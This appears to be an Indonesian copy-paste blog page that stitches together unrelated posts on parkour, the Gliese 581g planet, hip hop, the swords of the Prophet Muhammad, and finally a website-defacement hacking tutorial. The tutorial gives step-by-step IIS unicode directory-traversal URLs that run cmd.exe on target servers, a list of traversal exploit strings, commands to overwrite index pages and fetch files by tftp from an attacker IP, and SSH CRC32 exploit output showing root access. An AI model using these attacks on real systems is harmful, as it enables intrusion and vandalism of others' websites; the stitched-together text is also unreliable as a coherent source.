Selamat Datang di Blog Copy-Paste. Silahkan Melihat-lihat Isinya. Boleh Copy-Paste Ulang, tapi Dimohon untuk Melampirkan Alamat Saya di Blog Anda. Dan Dimohon untuk Jangan Lupa Memberikan serta Meninggalkan Komentar di Posting, ChatBox, atau di Mana Saja di Blog Ini. Salam Co-pas dari Saya (Pengelola Blog)!!!
Parkour (kadang-kadang disingkat pk) atau l'art du déplacement (seni gerak) adalah aktivitas yang bertujuan untuk berpindah dari satu tempat ke tempat lainnya, dengan efisien dan secepat-cepatnya, menggunakan prinsip kemampuan badan manusia. Itu berarti untuk menolong seseorang melintasi rintangan, yang bisa berupa apa saja di sekitar lingkungan dari cabang-cabang pohon dan batu-batuan hingga pegangan tangan dan tembok beton yang bisa dilatih di desa dan di kota. Atlet-atlet parkour dikenal sebagai "traceur" atau "traceuse" untuk perempuan.
Ia memiliki suhu panas yang memungkinkan manusia untuk berjemur di siang hari.
VIVAnews - Hasil pengamatan observatorium MW Keck di Hawaii, Amerika Serikat, selama 11 tahun membuahkan hasil. Para ilmuwan menemukan sebuah planet yang paling mirip dengan Bumi. Planet itulah kemungkinan bisa dihuni manusia.
Seperti dilansir Telegraph.co.uk, 29 September 2010, sebuah tim 'pemburu planet' menamai planet yang paling mirip dengan Bumi itu dengan nama Gliese 581g.
Planet yang ukurannya hampir sama dengan Bumi itu mengorbit dan berada di tengah 'zona huni perbintangan'. Peneliti juga menemukan zat cair dapat eksis di permukaan planet itu.
Ini akan menjadi planet paling mirip Bumi yang belum pernah ditemukan sebelumnya. Ini juga merupakan planet pertama yang paling berpotensi dihuni manusia.
"Temuan kami ini sangat menarik dan menawarkan kemungkinan bahwa planet ini berpotensi untuk dihuni," kata Profesor Steven Vogt di University of California.
Sebelumnya, Badan Antariksa AS (NASA) juga menemukan planet mirip bumi, Kepler 9.
Gliese 581g ditemukan berdasarkan observasi yang dilakukan menggunakan teknik tercanggih yang dikombinasikan dengan teleskop 'kuno'.
Yang paling menarik dari dua planet Gliese 581g adalah, dia memiliki massa tiga sampai empat kali dari Bumi dan periode orbit hanya di bawah 37 hari. Volume massa itu menunjukkan bahwa planet itu kemungkinan merupakan planet berbatu dengan permukaan tertentu. Itu juga menunjukkan bahwa planet itu memiliki gravitasi yang cukup.
Gliese 581g terletak dengan jarak 20 tahun cahaya dari Bumi, tepatnya berada di konstelasi Libra. Posisi planet ini, satu sisi selalu menghadap bintang dan memiliki suhu panas yang memungkinkan manusia untuk berjemur secara terus-menerus di siang hari. Di bagian samping yang menghadap jauh dari bintang, berada dalam kegelapan yang terus-menerus.
Para peneliti memperkirakan rata-rata suhu permukaan planet ini antara -24 dan 10 derajat Fahrenheit atau -31 sampai -12 derajat Celsius. Suhunya akan sangat terik saat posisinya menghadap bintang dan bisa terjadi pembekuan saat sedang gelap.
Menurut Profesor Vogt, gravitasi di permukaan planet itu hampir sama atau sedikit lebih tinggi dari Bumi, sehingga orang dapat dengan mudah berjalan tegak di planet ini.
"Faktanya, kami mampu mendeteksi planet ini begitu cepat dan sangat dekat. Ini memiliki arti bahwa planet seperti ini benar-benar berciri umum, seperti Bumi," jelasnya.
Prof Vogt dan Paul Butler, dari Carnegie Institution di Washington, mengatakan temuan-temuan baru tim itu dilaporkan dalam sebuah makalah yang akan diterbitkan dalam Jurnal Astrophysical. (kd)
Rap adalah salah satu unsur musik hip-hop. Rap merupakan teknik vokal yang berkata-kata dengan cepat, sementara pelakunya disebut rapper. Biasanya, rap diiringi oleh DJ maupun sebuah band.
Biasanya, rapper seperti penyanyi biasa, yaitu bernyanyi solo. Contohnya adalah Xzibit dan Jay-Z. Ada pula rapper yang menjadi anggota band, misalnya Mike Shinoda dari Linkin Park. Umumnya, rapper berkulit hitam karena banyak rapper berasal dari daerah pinggiran. Di antara sedikit rapper yang berkulit putih adalah Eminem dan Sean Paul. Rapper sering disebut pula dengan MC (Master of Ceremony).
Di Indonesia sendiri, musik rap telah berkembang dan menjadi salah satu genre yang diminati banyak anak muda. Musisi rap atau hip-hop lokal di dalamnya termasuk, Iwa K, Neo, Soul ID, Yacko, SAYKOJI, Rotra, X-Calibour, Daviuz, DyNamiD, Dmust Akira, Lazy P, Flatboy dan masih banyak lagi.
Hip Hop adalah sebuah gerakan kebudayaan yang mulai tumbuh sekitar tahun 1970’an yang dikembangkan oleh masyarakat Afro-Amerika dan Latin-Amerika. Hip Hop merupakan perpaduan yang sangat dinamis antara elemen-elemen yang terdiri dari MCing (lebih dikenal rapping), DJing, Breakdance, dan Graffiti. Belakangan ini elemen Hip Hop juga diwarnai oleh beatboxing, fashion, bahasa slang, dan gaya hidup lainnya.
Awalnya pertumbuhan Hip Hop dimulai dari The Bronx di kota New York dan terus berkembang dengan pesat hingga keseluruh dunia. Hip hop pertama kali diperkenalkan oleh seorang Afro-Amerika, Grandmaster Flash dan The Furious Five. Awalnya musik Hip Hop hanya diisi dengan musik dari Disk Jockey dengan membuat fariasi dari putaran disk hingga menghasilkan bunyi-bunyi yang unik. "Rapping" kemudian hadir untuk mengisi vokal dari bunyi-bunyi tersebut. Sedangkan untuk koreografinya, musik tersebut kemudian diisi dengan tarian patah-patah yang dikenal dengan breakdance. Pada perkembangannya Hip Hop juga dianggap sebagai bagian dari seni dan untuk mengekspresikan seni visual muncullah Graffiti sebagai bagaian dari budaya Hip Hop.
Ini adalah pedang-pedang yang pernah dipakai oleh Nabi Muhammad SAW semasa hidupnya untuk berdakwah, jumlah total pedang yang pernah digunakan ada 9 buah.
1. Al Ma’thur
Foto diambil oleh Muhammad Hasan Muhammad al-Tihami, Suyuf al-Rasul wa ‘uddah harbi-hi(Cairo: Hijr, 1312/1992).
Juga dikenal sebagai ‘Ma’thur Al-Fijar’ adalah pedang yang dimiliki oleh Nabi Muhammad SAW sebelum dia menerima wahyu yang pertama di Mekah. Pedang ini diberi oleh ayahnya, dan dibawa waktu hijrah dari Mekah ke Medinah sampai akhirnya diberikan bersama-sama dengan peralatan perang lain kepada Ali bin Abi Thalib. Sekarang pedang ini berada di Museum Topkapi, Istanbul. Berbentuk blade dengan panjang 99 cm. Pegangannya terbuat dari emas dengan bentuk berupa 2 ular dengan berlapiskan emeralds dan pirus. Dekat dengan pegangan itu terdapat Kufic ukiran tulisan Arab berbunyi: ‘Abdallah bin Abd al-Mutalib’.
2. Al 'Adb
Foto diambil oleh Muhammad Hasan Muhammad al-Tihami, Suyuf al-Rasul wa ‘uddah harbi-hi(Cairo: Hijr, 1312/1992).
Al-’Adb, nama pedang ini, berarti “memotong” atau “tajam.” Pedang ini dikirim ke para sahabat Nabi Muhammad SAW sesaat sebelum Perang Badar. Dia menggunakan pedang ini di Perang Uhud dan pengikut-pengikutnnya menggunakan pedang ini untuk menunjukkan kesetiaan kepada Nabi Muhammad SAW. Sekarang pedang ini berada di masjid Husain di Kairo Mesir.
3. Dhu Al Faqar
Foto diambil oleh Muhammad Hasan Muhammad al-Tihami, Suyuf al-Rasul wa ‘uddah harbi-hi(Cairo: Hijr, 1312/1992).
Dhu Al Faqar adalah sebuah pedang Nabi Muhammad SAW sebagai hasil rampasan pada waktu perang Badr. Dan dilaporkan bahwa Nabi Muhammad SAW memberikan pedang ini kepada Ali bin Abi Thalib, yang kemudian Ali mengembalikannya ketika Perang Uhud dengan bersimbah darah dari tangan dan bahunya, dengan membawa Dhu Al Faqar di tangannya. Banyak sumber mengatakan bahwa pedang ini milik Ali Bin Abi Thalib dan keluarga. Berbentuk blade dengan dua mata.
4. Al Battar
Foto diambil oleh Muhammad Hasan Muhammad al-Tihami, Suyuf al-Rasul wa ‘uddah harbi-hi(Cairo: Hijr, 1312/1992).
Al Battar adalah sebuah pedang Nabi Muhammad SAW sebagai hasil rampasan dari Banu Qaynaqa. Pedang ini disebut sebagai ‘Pedangnya para nabi‘, dan di dalam pedang ini terdapat ukiran tulisan Arab yang berbunyi : ‘Nabi Daud AS, Nabi Sulaiman AS, Nabi Musa AS, Nabi Harun AS, Nabi Yusuf AS, Nabi Zakaria AS, Nabi Yahya AS, Nabi Isa AS, Nabi Muhammad SAW’. Gambar ukiran nama-nama para nabi di dalamnya : Di dalamnya juga terdapat gambar Nabi Daud AS ketika memotong kepala dari Goliath, orang yang memiliki pedang ini pada awalnya. Di pedang ini juga terdapat tulisan yang diidentifikasi sebagai tulisan Nabataean. Sekarang pedang ini berada di Museum Topkapi, Istanbul. Berbentuk blade dengan panjang 101 cm. Dikabarkan bahwa ini adalah pedang yang akan digunakan Nabi Isa AS kelak ketika dia turun ke bumi kembali untuk mengalahkan Dajjal.
5. Hatf
Foto diambil oleh Muhammad Hasan Muhammad al-Tihami, Suyuf al-Rasul wa ‘uddah harbi-hi(Cairo: Hijr, 1312/1992)
Hatf adalah sebuah pedang Nabi Muhammad SAW sebagai hasil rampasan dari Banu Qaynaqa. Dikisahkan bahwa Nabi Daud AS mengambil pedang ‘Al Battar’ dari Goliath sebagai rampasan ketika dia mengalahkan Goliath tersebut pada saat umurnya 20 tahun. Allah SWT memberi kemampuan kepada Nabi Daud AS untuk ‘bekerja’ dengan besi, membuat baju baja, senjata dan alat perang, dan dia juga membuat senjatanya sendiri. Dan Hatf adalah salah satu buatannya, menyerupai Al Battar tetapi lebih besar dari itu. Dia menggunakan pedang ini yang kemudian disimpan oleh suku Levita (suku yang menyimpan senjata-senjata barang Israel) dan akhirnya sampai ke tangan Nabi Muhammad SAW. Sekarang pedang ini berada di Musemum Topkapi, Istanbul. Berbentuk blade, dengan panjang 112 cm dan lebar 8 cm.
6. Al Mikhdham
Foto diambil oleh Muhammad Hasan Muhammad al-Tihami, Suyuf al-Rasul wa ‘uddah harbi-hi(Cairo: Hijr, 1312/1992).
Ada yang mengabarkan bahwa pedang ini berasal dari Nabi Muhammad SAW yang kemudian diberikan kepada Ali bin Abi Thalib dan diteruskan ke anak-anaknya Ali. Tapi ada kabar lain bahwa pedang ini berasal dari Ali bin Abi Thalib sebagai hasil rampasan pada serangan yang dia pimpin di Syria. Sekarang pedang ini berada di Museum Topkapi, Istanbul. Berbentuk blade dengan panjang 97 cm, dan mempunyai ukiran tulisan Arab yang berbunyi: ‘Zayn al-Din al-Abidin’.
7. Al Rasub
Foto diambil oleh Muhammad Hasan Muhammad al-Tihami, Suyuf al-Rasul wa ‘uddah harbi-hi(Cairo: Hijr, 1312/1992).
Ada yang mengatakan bahwa pedang ini dijaga di rumah Nabi Muhammad SAW oleh keluarga dan sanak saudaranya seperti layaknya bahtera (Ark) yang disimpan oleh bangsa Israel. Sekarang pedang ini berada di Museum Topkapi, Istanbul. Berbentuk blade dengan panjang 140 cm, mempunyai bulatan emas yang didalamnya terdapat ukiran tulisan Arab yang berbunyi: ‘Ja’far al-Sadiq’.
8. Al Qadib
Foto diambil oleh Muhammad Hasan Muhammad al-Tihami, Suyuf al-Rasul wa ‘uddah harbi-hi(Cairo: Hijr, 1312/1992).
Al-Qadib berbentuk blade tipis sehingga bisa dikatakan mirip dengan tongkat. Ini adalah pedang untuk pertahanan ketika bepergian, tetapi tidak digunakan untuk peperangan. Ditulis di samping pedang berupa ukiran perak yang berbunyi syahadat: “Tidak ada Tuhan selain Allah, Muhammad Rasul Allah – Muhammad bin Abdallah bin Abd al-Mutalib.” Tidak ada indikasi dalam sumber sejarah bahwa pedang ini telah digunakan dalam peperangan. Pedang ini berada di rumah Nabi Muhammad SAW dan kemudian hanya digunakan oleh khalifah Fatimid. Sekarang pedang ini berada di Museum Topkapi, Istanbul. Panjangnya adalah 100 cm dan memiliki sarung berupa kulit hewan yang dicelup.
9. Qal’a
Foto diambil oleh Muhammad Hasan Muhammad al-Tihami, Suyuf al-Rasul wa ‘uddah harbi-hi(Cairo: Hijr, 1312/1992).
Pedang ini dikenal sebagai “Qal’i” atau “Qul’ay.” Nama yang mungkin berhubungan dengan tempat di Syria atau tempat di dekat India Cina. Ulama negara lain bahwa kata “qal’i” merujuk kepada “timah” atau “timah putih” yang di tambang berbagai lokasi. Pedang ini adalah salah satu dari tiga pedang Nabi Muhammad SAW yang diperoleh sebagai rampasan dari Bani Qaynaqa. Ada juga yang melaporkan bahwa kakek Nabi Muhammad SAW menemukan pedang ini ketika dia menemukan air Zamzam di Mekah. Sekarang pedang ini berada di Museum Topkapi, Istanbul. Berbentuk blade dengan panjang 100 cm. Didalamnya terdapat ukiran bahasa Arab berbunyi: “Ini adalah pedang mulia dari rumah Nabi Muhammad SAW, Rasul Allah.” Pedang ini berbeda dari yang lain karena pedang ini mempunyai desain berbentuk gelombang.
Zzzz..... *Clink* "We Come Back" (((dolby stereo))) pakabar sob dekaters ?? gimana da pahamin lom posting sebelumnya?? pasti rada puyeng ya!! ato malah pusingnya ampe sekarang belom sembuh ? hehhehe, kali ini kita tambahin pusing kalian jadi 2 ( dua ) kali lipat ato bahkan berlipat-lipat . Gini Sob, kita tau ilmu didunia maya luas banged dan banyak sekali kontoversi baik positif/negatif, posting kali ini bukannya ngajarin kalian untuk berbuat jahat ato usil tapi kita hanya sekedar pengen berbagi pengetahuan saja ga` ada motif laen dan kita juga ga menganjurkan untuk kalian mempraktekkannya, setiap tindakan kita sudah ada yang mencatatnya kita tahu itu.. tapi namanya juga kita hanya manusia yang egois dan selalu mendahulukan kepuasan batin nah.. itu awal dari kehancuran kita sendiri dan nantinya dimintai pertanggung-jawaban dari semua itu.
Aduh, koq jadi ngelantur gini ya ) Ok Sob , kita langusng ke pokok pembahasan tapi pesan kita "Resiko Ditanggung Masing - Masing". Pada posting ini kita coba membahas "deface website" apa itu ?? Deface adalah kegiatan untuk mengganti ataupun merubah tampilan halaman depan sebuah situs. Tentu saja prosesnya ilakukan dengan memanfaatkan kelemahan dari situs tersebut, sehingga kalo sob adalah web master dan sob ngerubah tampilan halaman situs yang sob punya tentu saja itu nggak bisa disebut deface...heheheh. Banyak yang bertanya "gimana sich nge-deface situs?" proses deface dilakukan dengan memanfaatkan lubang (hole) yang terdapat pada server tempat situs itu berada. Sehingga hal pertama yang harus kalian ketahui untuk melakukan proses deface adalah OS (Operating System) dari server situs tersebut. Hal ini karena karakteristik dari tiap OS yang berbeda-beda, contohnya antara IIS dengan BSD tentu saja sangat berbeda apabila kita ingin melakukan deface diantara kedua OS tsb. Operating System atau OS biasanya kalo kita kelompikin ke 2 keluarga besar,yaitu :
1. IIS (server untuk microsoft, dkk) 2. Unix(linux,BSD,IRIX,SOLARIS,dsb)
elalui tutor ini saya teh hanya ingin berbagi pengalaman mengenai cara men-deface website yang menggunakan Microsoft Internet Information Server atau Microsoft IIS. Harap DeFaceR (sebutan bagi org yg suka deface..;p) ketahui...Microsoft Internet Information Server atau MS IIS 4.0/5.0 memiliki suatu bug yang dinamakan "unicode bug". Sayah tidak akan menjelaskan panjang lebar mengenai "unicode bug" ini karena sayah takut salah menjelaskan (ssSSTTtHHH!! gn bilang sapa2 yah sebenernyah sayah teh emang gak tau ...ehehehheehhe..;p~). Yang jelas dengan bug ini kita bisa mengeksplorasi komputer target dengan hanya menggunakan internet browser.
OK...mari kita mulai...Pertama kita cari site site target terlebih dahulu di search engine (google,yahoo,dll)...key nya terserah kowe.....Lalu utk mengetahui site itu menggunakan MS IIS 4.0/5.0...Kita scan terlebih dahulu di www.netcraft.com......dapat site yah..??...Okeh..setelah kita mendapatkan site yg menggunakan MS IIS 4.0/5.0 ...Langkah selanjutnya utk mengetahui site tersebut belum di-patch bug unicode nya mari kita scan site tersebut di mirc (utk mengeteahui cara scan lewat mirc....coba koe buka http://www.jasakom.com/hacking.asp page 3 Scanning Exploit Unicode Dengan MIRC),bisa juga memakai sopwer yg bisa and DL di http://accessftp.topcities.com/.... or memakai cara manual yg lebih sering kita gunakan ehehhehehhee...contoh:
Ada dua kemungkinan yang tampil pada browser Anda yaitu: Kahiji : Muncul pesan ERROR ... Kaduana : Muncul daftar file-file dari drive C pada komputer server target. Bila ini terjadi maka www.targethost.com tadi ada kemungkinan untuk bisa kita deface...
Mari kita perhatikan URL aneh bin ajaib diatas. Akan sayah bagi URL diatas menjadi empat bagian yaitu : · Bagian host, yaitu "http://www.targethost.com" · Bagian exploit string, yaitu "/scripts/..%255c..%255c" · Bagian folder, yaitu "/winnt/system32/" · Bagian command, yaitu "cmd.exe?/c+dir+c:\"
Kita lihat pada bagian command diatas menunjukkan perintah "dir c:\" yang berarti melihat seluruh file-file yang berada pada root drive C. Koe bisa mencoba perintah yang lain seperti "dir d:\" atau yang lain. Ingat, Koe harus mengganti karakter spasi dengan tanda "+". Koe bahkan bisa menge tahui konfigurasi IP address komputer tujuan dengan mengetikkan perintah "ipconfig.exe /all"
Selain itu ada beberapa kemungkinan yaitu bisa saja URL diatas masih menampilkan error pada browser koe. Untuk itu koe ganti sajah bagian eksploit stringnyah, eksploit string yg sering tembus adalah : - /cgi-bin/..%255c..%255c - /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af.. - /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af.. - /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af.. - /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af.. - /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af.. - /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af.. - /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af.. - /scripts/..%255c..%255c
Jika semua pilihan eksploit string diatas masih memunculkan pesan error pada browser koe maka kemungkinan besar IIS pada web server sudah di-patch bug unicode nya (OR IE kowe yg lagie dodolss ...hiheiehiehiehei). Dan koe bisa memilih situs lain sebagai sasaran....(yg sabar yah nak nyari targetnyah...ehehhehehe).
Lanjuttt......udeh dapet site yg bug unicodenyah gak di patch..??....Langkah berikutnya adalah mengetahui di folder manakah diletakkan dokumen-dokumen web seperti default.htm/html/asp,,index.htm/html/asp,home.htm/html/asp,main.htm/html/asp,.ada juga yg pake .php/php3/shtml. Folder ini dinamakan web root. Biasanya web root berada di C:\InetPub\wwwroot\ atau D:\InetPub\wwwroot. Tapi terkadang web administrator menggantinya dengan yang lain. Untuk mengetahuinya koe cukup mengetikkan URL seperti di bawah ini
URL diatas akan menampilkan daftar environment variable dari web server sasaran. Kebuka..??...Nah tugas koe skrg adalah mencari PATH_TRANSLATED atau tulisan PATH_TRANSLATEDnyah...gak ada yahh ..??...coba deh koe ripresh lagehh...udah ketemuuu...nah skrg kita DIR deh tuh si PATH_TRANSLATED nyah.....Kita ambil contoh PATH_TRANSLATEDnyah : C:\InetPub\wwwroot....Perintahnya ng-DIR nyah :
Huaaaaaaa....isinyah banyak banged yahh.....mana dokumen2 web yg kita curigain itu ada 3 bijih. lagehh... .hemm santeyy...oiyahh...lupa sayah...Tugas kita setelah ng-DIR PATH_TRANSLATEDnyah..... truss kita cari dokumen web itu disitu utk kita RENAME....gemana kalo misalnyah dokumen2 web yg kita curigain itu ada 3..santeyy...coba skrg koe buka site aslinyah di laen window.... http://www.targethost.com == neh yg ini......di situ kan alias di http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot dokumen2 web nyah ada 3 macem pasti kita bingung yg mana neh yg mo di RENAME....misalnya : di
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot itu ada : Directory of C:\InetPub\wwwroot 07/20/01 03:21p 1,590 default.htm 07/20/01 03:21p 590 index.html 07/20/01 03:21p 3,453 main.html
Udah di buka kan site aslinyah...nah coba masukin salah satu dokumen web itu di site asli nyah... contoh : http://www.targethost.com/default.htm kita liad hasilnya apa kah sama gambarnya (halaman depannya) setelah kita masukin dokumen web tadee.waww ternyata tidak sama hemm.coba masukin lageh salah satu dokumen web itu site aslinyah.mMmm..kita masukin yg main.html.waww waww..ternyata sama gambarnyahh.Nah skrg kita RENAME deh yg main.html ituu. perintahnya :
CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are: Access is denied
Yahhhh..akses dineyy.hiekksss jgn nyerah bro` kita carih lageh targetnyah okeHh !!!Dapat targetnyah..??udah di RENAME nyah??.Hasilnya setelah di RENAME seperti di bawah ini bukan??
CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :
Kalo iyahh.waaa selamat anda telah merubah or berhasil men-deface halaman depan web site tersebut.kalo gak caya buka ajah site aslinyah pasti ERROR kann ehehhehehhee (Jgn lupa kita simpan C:\InetPub\wwwroot\main.html *file yg kita rename tadi di notepad utk langkah selanjutnyah*)
Sekarang koe tugasnyah meng-upload file koe ke site tadee Ada dua cara my bro` Pertama lewat ECHO..Kedua lewat TFTP32.
*Cara pertama :* Utk meng-upload file lewat echo sebelumnyah kita harus mengcopy file cmd.exe pada direktori C:\winnt\system32 ke suatu folder lain atau folder yang sama dengan nama lain, misalnya cmdku.exe. Untuk meng-copy cmd.exe menjadi cmdku.exe pada folder winnt\system32 maka cukup ketik URL berikut :
CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are : 1 file(s) copied.
Tujuan kita meng-copy cmd.exe menjadi cmdku.exe adalah agar kita bisa menjalankan perintah echo dengan lengkap. Apabila Anda menggunakan cmd.exe maka perintah echo tidak bisa digunakan untuk menulis atau membuat file.
Okeih Sob skrg mari kita up-load file nya lewat perintah echo perintahnya :
dapat dilihat disini Kita liat apa yg terjadi di IE kita.
CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :
Waa..waaa.selamat anda telah berhasil meng-upload file anda lewat cara echo tadee silahkan buka web site target tadi
Oiyahh sayah uraikan sedikit URL ajaib tadii. Sayah akan membagi URL tadi menjadi empat bagian :
* Bagian hosting dan exploit string yaitu, http://www.targethost.com/scripts/..%255c..%255c * Bagian command yaitu, cmdku.exe?/c+echo+ * Bagian HTML * Bagian PATH_TRANSLATEDnyah(rootnyah)+Dokumen webnyah yaitu, C:\InetPub\wwwroot\main.html
Cara Kedua Utk meng-upload file lewat TFTP32 sebelumnyah koe2 orang harus mendownload sopwer TFTP32 terlebih dahulu di http://www.download.com ketik keynya TFTP32 dan koe harus maen diserver (sebab di user pasti takkan bisa). Meng-upload file lewat TFTP32.. koe tdk perlu mengcopy cmd.exe nyah langsung sajah.mari kita mulai meng-uploadnyah perintahnya :
* http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+tftp+-i+202.95.145.71(IP mu)+get+antique.htm(file yg mau koe up-load)+ C:\InetPub\wwwroot\main.html
Kita liat lagi apa yg terjadi di IE kita.
CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :
Waa..waaa.selamat anda telah berhasil meng-upload file anda memakai sopwer TFTP32 tadee silahkan buka web site target tadi.
Sayah akan uraikan juga URL tadee menjadi 4 bagian :
* Bagian hosting dan exploit string yaitu, http://www.targethost.com/scripts/..%255c..%255c * Bagian folder, yaitu /winnt/system32/ * Bagian command, yaitu cmd.exe?/c+tftp+-i+202.95.145.71(IPmu)+get+antique.htm(file yg mau koe up-load)+ * Bagian PATH_TRANSLATEDNYAH(rootnyah)+Dokumen webnyah yaitu, C:\InetPub\wwwroot\main.html
Kekurangannyah dalam meng-upload file lewat TFTP32terkadang suatu server (web site) tidak mau menerima up-load file kita tadee.Jikalau itu terjadi maka gunakanlah cara pertama diatas tadee.
Sebelumnya dan sesudahnyah sayah mo ngejelasin bahwa tutorial ini tidak mempunyai maksud tertentu selain untuk ilmu pengetahuan dan kebebasan dalam berbagi ilmu pengetahuan. Sayah tidak bertanggung jawab apapun terhadap segala sesuatu yang terjadi akibat tutorial ini. Tutorial ini bersifat terbuka yang berarti Anda bisa memberikan kritik dan saran terhadap tutorial ini.
Nah itu adalah cara pemanfaatan lubang di IIS server yang dikenal dengan nama UNICODE, untuk tambahan bahwa sekarang UNICODE telah berkembang banyak ditemukan beberapa bug baru yang dapat dimanfaatkan untuk masuk ke server IIS, untuk hal ini kalian bisa cari di situs2 cyber underground...hehehehe "yang kreatif donk..!!"
Okeh sekrang kita ke UNIX yah...di unix sendiri yang perlu dilakukan untuk men-deface situs adalah memperoleh fasilitas root dari server tsb. Cara memperoleh fasilitas root tentu saja melalui exploit (mengenai masalah exploit bisa kalian lihat di bagian "Hacking Shell"). Nah disini gue akan memberi salah satu contoh mendapatkan fasilitas root dari exploit "SSH CRC32 Exploit", exploit ini ditujukan pada SSH server yang berjalan pada SSH protocol 1 atau SSH protocol 2 configured to drop back to protocol 1 Ketika berjalan exploitnya akan bekerja seperti ini :
ATTACH NOW Changing MSW of return address to: 0x0808 Crash, finding next return address Changing MSW of return address to: 0x0809 Crash, finding next return address Changing MSW of return address to: 0x080a Crash, finding next return address EX: buf: 0x080835ec h: 0x0807d000 ret-dist: 0xb7f7dcf6
ATTACH NOW Changing MSW of return address to: 0x0808 Crash, finding next return address Changing MSW of return address to: 0x0809 Crash, finding next return address Changing MSW of return address to: 0x080a Crash, finding next return address EX: buf: 0x080835ec h: 0x0807d000 ret-dist: 0xb7f7dcfc
ATTACH NOW Changing MSW of return address to: 0x0808 Crash, finding next return address Changing MSW of return address to: 0x0809 No Crash, might have worked Reply from remote: CHRIS CHRIS
***** YOU ARE IN *****
localhost.localdomain
Linux localhost.localdomain 2.2.16-22 #1 Tue Aug 22 16:49:06 EDT 2000 i686 unknown
.....HOREEEEE...dapat root heheehehhe, nah sekarang loe udah mendapatkan fasilitas root, okeh sekarang kita mulai men-deface situs yang tedapat pada server tsb. Pertama-tama perlu kalian ketahui bahwa biasanya halaman index pada server UNIX ditempatkan pada direktori tertentu, yaitu : home/html atau home/html/httpd atau bisa juga di direktori var/html atau var/html/httpd naH..tunggu apa lagi coba deh loe liat-liat isi direktori itu...untuk meyakinkannya loe buka situs tsb pada browser dan lihatlah apa nama dari file halaman index situs itu..hmmm biasanya sich index.html atau index.htm Udah dapat indexnya? kalo udah sekarang loe bisa echo deh...gampang kan??? heheheh..cuman kalo gue rada malas sich make echo mending bikin halaman baru...;)), gini caranya :
1. ganti dulu nama indexnyamv index.htm oldindex.htm 2. sekarang buka editor dari shell, bisa make vi atau pico : vi index.htm 3. masukan HTML yang kalian buat di vi ataupun pico tadi 4. buka browser kalian....heheeheh..udah ganti kan sekrang halamannya..:))) SiiiPPPP..!!
Gitu aja kok caranya...mudah aja kan..?? hehehhe...intinya memang cuman bagaimana mendapatkan fasilitas root pada server, dan seperti yang telah gue bilang tadi bahwa setiap server memiliki karakteristik yang berbeda-beda sesuai dengan OS nya masing2. Sehingga diperlukan exploit yang berbeda apabila kita ingin mencoba menembus server yang memiliki OS yang berbeda pula...so many exploit out thare...just get iT..!! hehehheudah dulu yah...BUBAYYYYYY!!!!!!!!!!!!